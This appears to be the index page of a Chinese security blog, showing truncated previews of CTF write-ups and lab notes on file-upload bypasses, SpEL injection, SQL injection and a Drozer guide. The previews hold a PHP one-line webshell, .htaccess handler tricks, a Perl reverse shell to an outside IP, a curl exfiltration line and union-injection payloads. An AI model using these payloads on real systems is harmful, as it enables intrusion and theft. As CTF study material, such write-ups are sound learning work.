Tyaoo's Blog

de1ta 师傅出的题质量真的太高了，膜拜一下 checkin文件上传题目 先上传 .htaccess，php 字段使用反斜杠绕过 12AddType application/x-httpd-p\hp .png 然后上传后缀为 .png 的一句话木马访问即可 1<?= system('cat /flag'); calcjava 计算器题目 这题是环境坏了捡了个漏 抓包修改 clac，添加一些图书字符使其报错，发现是 springboot 框架 可以知道是 SpEL 表达式注入 fuzz 之后过滤了以下关键字 1234567891011- T\s*\(- \#- new- java\.lang- Runtime- exec.*\(- getRuntime- ProcessBuilder- start- getClass- String payload 可以结合 java 的反射机制和字符串拼接可以绕过黑名单 12"".class.forName("java.l"+"ang.Ru"+& ...

Drozer 工具入门 Drozer 安卓渗透环境win10 + Python2.7 模拟器夜神模拟器 安装 Drozer下载Drozer 下载adb 下载apktool 下载dex2jar 下载jd-gui 模拟器安装 Drozer直接把下载的 agent.apk 拖到模拟器开启就行 本地开启 Drozer连接模拟器端口这里的62001是夜神模拟器使用的端口 1adb connect 127.0.0.1:62001 其他模拟器端口参考如下 模拟器名称 连接默认端口 夜神安卓模拟器 62001 逍遥安卓模拟器 21503 BlueStacks(蓝叠安卓模拟器) 5555 雷电安卓模拟器 5555 天天安卓模拟器 6555 网易MuMu(安卓模拟器) 7555 安卓模拟器大师 54001 查看连接连接状态1adb devices 进入安卓 shell1adb shell 端口转发把安卓的41415端口转发到本机的41415端口 1adb forward tcp:31415 tcp:31415 连接 Drozer1drozer cons ...

师傅们出的题目都挺有意思 自己还是有很大差距 dooog下载源文件后查看主要有三个站，分别是 client 端、cmd_server 端和 kdc 端，下面是我整理三个文件夹逻辑，随缘看一下。 1234567891011121314151617181920212223242526272829303132333435363738394041# cmd_server/app.pyflag = os.system("curl http://xxxxxx/`readflag`")1. os.system(msg[2])2. username == msg[1]3. username = cryptor.decrypt(base64.b64decode(authenticator))4. authenticator = request.form.get('authenticator')5. msg = cryptor.decrypt(base64.b64decode(server_message)).split('|')6. ser ...

有很多地方没有转过来，思维过于僵硬，感谢赵师傅出的精美题目 HappyCTFdCTFd 的漏洞 简单来说来说就是注册带空格恶意用户名然后忘记密码进行修改 https://www.colabug.com/2020/0204/6940556/ Checkin找了亿个反弹 shell，下面是有用的一个 https://zerokeeper.com/experience/a-variety-of-environmental-rebound-shell-method.html http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 1perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.216.98:9000");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 系统没有 losf、ps ...

学习到了一点新知识 easysqli_copy本题漏洞比较明显，PDO 支持堆叠注入，然后用十六进制绕过 check。 1234567891011121314151617181920212223242526272829303132333435363738394041424344import requestsimport stringimport binasciiimport urllib.parseimport threadingurl = "http://4efaa4d7badc406b9b50ecab0c36eaeb13b1c0c4b1b14e55.changame.ichunqiu.com/"flag = ""index = 1chset = string.printablesession = requests.Session()# dbname = pdotest# tbname = table1# clname = balabala,eihey,fllllll4g,bbbflag = ''index = 1w ...

之前的一些关于 upload-labs 的练习 Pass-01修改后缀名 Pass-02Content-type 改为 image/gif Pass-03 改后缀名 php2, php3, php4, php5, phps, pht, phtm, phtml 重写文件解析规则绕过。上传先上传一个名为.htaccess文件，内容如下： 123<FilesMatch "03.jpg">SetHandler application/x-httpd-php</FilesMatch> 然后再上传一个03.jpg 执行上传的03.jpg脚本 Pass-04查看源代码 发现黑名单几乎过滤了全部的违法后缀名 ，但少过滤了 .htaccess 后缀 上传一个.htaccess 文件 重写 服务器的文件解析 创建一个 .htaccess 文件 内容可以是 : AddType application/x-httpd-php .jpg,可将jpg文件解析为php文件. 或者是 : SetHandler application ...

之前的一些关于 sqli-labs 的练习 Less-1（单引号 union 注入）12345?id=' union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database()--+?id=' union select 1,2,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = database() and TABLE_NAME = 'users'--+?id=' union select 1,2,group_concat(password) from users--+ Less-2（无引号 union 注入）12345?id=0 union select 1,2,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES wher ...